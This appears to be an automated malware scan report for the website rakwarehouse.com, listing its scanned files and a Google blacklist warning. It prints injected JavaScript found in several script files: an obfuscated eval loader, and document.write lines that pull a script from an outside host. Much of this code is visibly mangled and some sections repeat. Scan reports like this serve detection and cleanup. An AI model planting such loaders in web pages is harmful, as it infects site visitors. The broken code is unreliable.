Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rakwarehouse.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rakwarehouse.com/ | 200 OK Content-Length: 14937 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://rakwarehouse.com/jqueryslidemenu.js | 200 OK Content-Length: 2549 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); var arrowimages={down:['downarrowclass', 'down.gif', 23], right:['rightarrowclass', 'right.gif']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#" menuid ">ul") var $headers=$mainmenu.find("ul").parent() $headers.each(function(i){ var $curobj=$(this) var $subul=$(this).find('ul:eq(0)') this._dimensions={w:t }, function(e){ var $targetul=$(this).children("ul:eq(0)") $targetul.slideUp(jqueryslidemenu.animateduration.out) } ) $curobj.click(function(){ $(this).children("ul:eq(0)").hide() }) }) $mainmenu.find("ul").css({display:'none', visibility:'visible'}) }) } } jqueryslidemenu.buildmenu("myslidemenu", arrowimages) Antivirus reports:
| ||
http://rakwarehouse.com/js/jquery-1.4.min.js | 200 OK Content-Length: 625 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) q5bZq20Zq4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq58Zq70Zq6fZq6bZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[xlzpj]("Zq");}phycx=hzqijk;dujf=[];for(yqng=22-20-2;-yqng 1456!=0;yqng =1){vdzs=yqng;if((0x19==031))dujf =ckiqh.fromCharCode(eval(sulc phycx[1*vdzs]) 0xa-acgbwb);}hga=eval;if(Math.ceil(5.5)===6)hga(dujf)} /*/a9a007*/ Antivirus reports:
| ||
http://rakwarehouse.com/js/loopedslider.js | 200 OK Content-Length: 9212 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); if(typeof jQuery != 'undefined') { jQuery(function($) { $.fn.extend({ loopedSlider: function(options) { var settings = $.extend({}, $.fn.loopedSlider.defaults, options); return this.each( function() { if($.fn.jquery < '1.3.2') {return;} var $t = $(this); var o = $.metadata ? $.extend({}, settings, $t.metadata()) : settings; var distance = 0; var times = 1; break; } }; } ); } }); $.fn.loopedSlider.defaults = { container: ".container", slides: ".slides", pagination: "pagination", containerClick: true, autoStart: 0, restart: 0, slidespeed: 300, fadespeed: 200, autoHeight: 0, addPagination: false }; }); } document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://rakwarehouse.com/js/jquery.tabs.pack.js | 200 OK Content-Length: 5875 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''); eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('(4($){$.2l({z:{2k:0}});$.1P.z=4(x,w){3(O x==\'2Y\')w=x;w=$.2l({K:(x&&O x==\'1Z\'&&x>0)?--x:0,12:C,J:$.1f?2h:T,18:T,1r:\'2X&am document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://rakwarehouse.com/index.html | 200 OK Content-Length: 14937 Content-Type: text/html | clean |
http://rakwarehouse.com/aboutus.html | 200 OK Content-Length: 9512 Content-Type: text/html | clean |
http://rakwarehouse.com/vision.html | 200 OK Content-Length: 10924 Content-Type: text/html | clean |
http://rakwarehouse.com/location.pdf | 200 OK Content-Length: 300915 Content-Type: application/pdf | clean |
http://rakwarehouse.com/test404page.js | 404 Not Found Content-Length: 413 Content-Type: text/html | clean |
http://rakwarehouse.com/faq.html | 200 OK Content-Length: 13164 Content-Type: text/html | clean |
http://rakwarehouse.com/advrakwl.html | 200 OK Content-Length: 19464 Content-Type: text/html | clean |
http://rakwarehouse.com/rakia.html | 200 OK Content-Length: 13595 Content-Type: text/html | clean |
http://rakwarehouse.com/tech.html | 200 OK Content-Length: 12105 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rakwarehouse.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:20:28 GMT
Accept-Ranges: bytes
ETag: "1fc141b-3a59-4ffb7453d6cae"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 14937
Content-Type: text/html
Last-Modified: Sun, 03 Aug 2014 10:41:52 GMT
...14937 bytes of data.
GET / HTTP/1.1
Host: rakwarehouse.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:20:28 GMT
Accept-Ranges: bytes
ETag: "1fc141b-3a59-4ffb7453d6cae"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 14937
Content-Type: text/html
Last-Modified: Sun, 03 Aug 2014 10:41:52 GMT
...14937 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rakwarehouse.com
Referer: http://www.google.com/search?q=rakwarehouse.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rakwarehouse.com
Referer: http://www.google.com/search?q=rakwarehouse.com
Result:
The result is similar to the first query. There are no suspicious redirects found.